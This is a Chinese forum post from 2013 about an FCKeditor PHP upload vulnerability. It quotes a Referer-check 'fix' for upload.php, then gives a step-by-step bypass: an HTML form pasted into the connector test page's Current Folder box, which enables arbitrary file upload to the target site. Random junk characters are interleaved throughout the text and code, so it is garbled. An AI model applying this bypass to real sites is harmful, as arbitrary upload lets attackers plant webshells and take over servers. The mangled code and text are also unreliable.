漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
8 |& m/ v( E/ ?( e& i网上给出的修复方案是' y, |4 \; U$ l: l& b6 n7 A
修复方法,删除FCK编辑器用其他的编辑器8 b! q6 r4 F) L5 q( }! {* Q
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
/ Y) c6 s& P1 l在
0 F4 e |1 B; ~( n: Yrequire(‘config.php’);7 j7 _& `5 x0 f0 _5 e
require(‘util.php’);8 ~# K2 a5 q7 K% C/ y) O
的下面添加以下代码—————————–
2 m/ s! F, o8 U/ l//防止外部提交3 f3 w C5 V. d) ?# Y3 b
function outsidepost(), |+ P4 G1 y3 V- ~- h1 n1 R! W/ K
{
+ Q3 c) r. K% w; e6 ^$servername=$_SERVER['SERVER_NAME'];
1 q2 w7 |4 \/ F. S$sub_from=@$_SERVER['HTTP_REFERER'];9 y4 j: d. q. c! \
$sub_len=strlen($servername);
5 o! u+ y, ]: G$ Z. p! z$checkfrom=substr($sub_from,7,$sub_len);
* j0 D4 w/ C3 L( Y% j; I K8 Sif($checkfrom!=$servername){% V6 N+ I) ~4 W; G) {
echo(“you don’t outsidepost!”);
& k# l* C& O3 t% @, K1 F+ Gexit;. R2 j. } R+ z. [5 j3 N/ _6 n& f
}
: Q& V' |, o6 }+ y$ M}
( a6 I; D+ z k$ Aoutsidepost();
X9 ?7 i. ?2 W) H2 y2 E3 G防止外部提交,但是没有防止内部提交,( \ s) ?( [' R+ X0 K/ Z/ L
利用方法:6 C. S: s* Q( r/ E9 p* t
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html% K/ i I7 \" }* x, E% J
2,在Current Folder 框输入6 Z( ?$ g( v! j* {
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>0 F6 z; |! s$ d* ?% s
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
9 |* ~5 a4 R' G# U# W: GPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对